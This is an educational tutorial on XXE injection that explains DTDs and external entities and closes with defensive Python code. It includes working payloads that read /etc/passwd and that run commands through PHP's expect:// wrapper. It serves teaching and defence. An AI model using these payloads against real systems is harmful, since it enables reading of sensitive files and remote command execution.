XML External Entities (XXE) Injection

What is it?

If your web application processes user-submitted XML data, it may be vulnerable to an attack that lets an attacker read any file on the filesystem that the application itself is able to read.

XML parsers allow a document to define ‘entities’, named placeholders that the parser replaces with content. An entity whose content lives outside the XML file is called an ‘external entity’. It can be used to access local or remote content via a URI (the familiar URL is one kind of URI). A URI typically looks something like [protocol]://[path]. For example, loading /etc/passwd on a local Linux system would look like:

file:///etc/passwd
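To make the [protocol]://[path] shape concrete, here is a minimal Python sketch that splits a URI into its parts using the standard library. The helper name describe_uri and the example.com address are made up for illustration.

```python
from urllib.parse import urlsplit


def describe_uri(uri):
    """Split a URI into the [protocol] and [path] parts described above."""
    parts = urlsplit(uri)
    return {"protocol": parts.scheme, "host": parts.netloc, "path": parts.path}


# A local file has an empty host part, hence the three slashes in a row.
local = describe_uri("file:///etc/passwd")

# A remote resource names a host between the '//' and the path.
remote = describe_uri("http://example.com/data.xml")

print(local)
print(remote)
```

The protocol part is what tells the parser how to fetch the content, which is why the same entity mechanism can reach both local files and remote servers.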

Using this to attack

First, we create what is known as a Document Type Definition, or DTD for short. This allows us to define XML elements (the tags that make up the document) as well as entities. A DTD that declares one element and one external entity looks like so:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE [DTD-name]
  [<!ELEMENT [element-name] ANY >
   <!ENTITY [entity-name] SYSTEM "[protocol]://[path]" >]>

Where [DTD-name], [element-name], [entity-name], [protocol] and [path] are, respectively, the DTD name, XML element name, entity name, protocol and resource path of the thing you’re trying to access. When we want to reference the entity’s content in the actual XML, we use the following notation:

&[entity-name];

So our attacking XML, assuming we are trying to read /etc/passwd, would look something like this:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
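To see how a parser reads the declaration above, the following Python sketch lists the entities a document declares without fetching any of them. It relies on the standard library's expat bindings; the function name list_declared_entities is hypothetical, and the sketch assumes that no external-entity handler is installed, so nothing is read from disk.

```python
import xml.parsers.expat

# The example payload from the text, as bytes so the declared encoding applies.
PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""


def list_declared_entities(xml_bytes):
    """Return every entity declared in the document's DTD."""
    found = []

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        # expat passes value=None for external entities; their location
        # is carried in system_id instead.
        found.append({
            "name": name,
            "system_id": system_id,
            "external": value is None,
        })

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)  # True marks this as the final chunk
    return found


entities = list_declared_entities(PAYLOAD)
print(entities)
```

An entity reported as external with a file:// system identifier is exactly the pattern the attack depends on, so a check like this could be used to flag suspicious submissions.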

Is file access the only thing that can be done with this?

Depending on the server in question, no. If the web server runs PHP with the ‘expect’ extension loaded, which provides the expect:// wrapper, it is possible to get command execution on the machine like so:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
  [<!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "expect://[command]" >]>
<foo>&xxe;</foo>

How do system administrators protect against this?

The main protection sysadmins can use when defending a service that requires XML data is simply not to trust any DTD data enclosed in the submitted XML, and instead to use a static DTD stored locally. That way, the attacker cannot redefine the DTD or any of its elements, and therefore cannot define entities of their own.
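One strict way to act on "do not trust any DTD data enclosed in the XML" is to refuse any submission that carries its own DOCTYPE. The Python sketch below does this with the standard library's expat bindings before handing the document to ElementTree. The names DTDForbidden and parse_untrusted_xml are hypothetical, and the sketch does not validate against a local DTD, since the Python standard library has no validating parser; it only enforces the "no attacker-supplied DTD" half of the advice.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when submitted XML carries its own DOCTYPE declaration."""


def parse_untrusted_xml(xml_bytes):
    """Parse XML only if it contains no inline DOCTYPE (hypothetical helper)."""

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Called by expat as soon as it meets '<!DOCTYPE'; raising here
        # aborts the parse before any entity declaration is read.
        raise DTDForbidden(f"inline DOCTYPE {name!r} is not allowed")

    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject_doctype
    checker.Parse(xml_bytes, True)  # first pass: look for a DOCTYPE

    # Second pass: the document declared no DTD, so no entities of the
    # attacker's choosing can exist in it.
    return ET.fromstring(xml_bytes)


hostile = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""

try:
    parse_untrusted_xml(hostile)
    rejected = False
except DTDForbidden:
    rejected = True

benign = parse_untrusted_xml(b"<foo>hello</foo>")
print(rejected, benign.text)
```

Parsing the input twice keeps the sketch simple at the cost of some speed. Malformed XML surfaces as an expat error from the first pass rather than as DTDForbidden.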